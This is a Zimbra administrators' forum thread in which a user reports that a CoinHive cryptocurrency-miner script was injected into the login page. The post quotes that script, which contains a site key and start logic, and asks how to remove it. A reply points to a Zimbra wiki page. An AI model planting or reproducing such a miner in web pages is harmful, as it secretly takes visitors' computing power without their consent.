coin miner attack

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
Posts: 1
Joined: Fri Sep 14, 2018 1:27 am

coin miner attack

Postby ecunanan » Fri Sep 14, 2018 8:37 am

We recently have an issue where in our login page run a script for coin miner. we need to remove the script from the login page since our site is being tag as a coinminer site.
We found this said script inside the file and compiles to login_jsp.class. both file has Nov 2017 date stamp.
#<script src=""></script>
# var miner = new CoinHive.Anonymous('dLbuCDfqubF6T7taC7cXcnkSFV20l5wp', {throttle: 0.5});
# // Only start on non-mobile devices and if not opted-out
# // in the last 14400 seconds (4 hours):
# if (!miner.isMobile() && !miner.didOptOut(14400)) {
# miner.start();
# }
How could we remove this from our login page?

User avatar
L. Mark Stone
Elite member
Elite member
Posts: 2139
Joined: Wed Oct 09, 2013 11:35 am
Location: Portland, Maine, US
ZCS/ZD Version: 8.8.15 Network Edition

Re: coin miner attack

Postby L. Mark Stone » Fri Sep 14, 2018 2:45 pm

You don't say what version of Zimbra you are running.

If an older version, then Zimbra published this wiki to help: ... ng_Systems

Hope that helps,
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner
Zeta Alliance

Return to “Administrators”

Who is online

Users browsing this forum: Bing [Bot] and 9 guests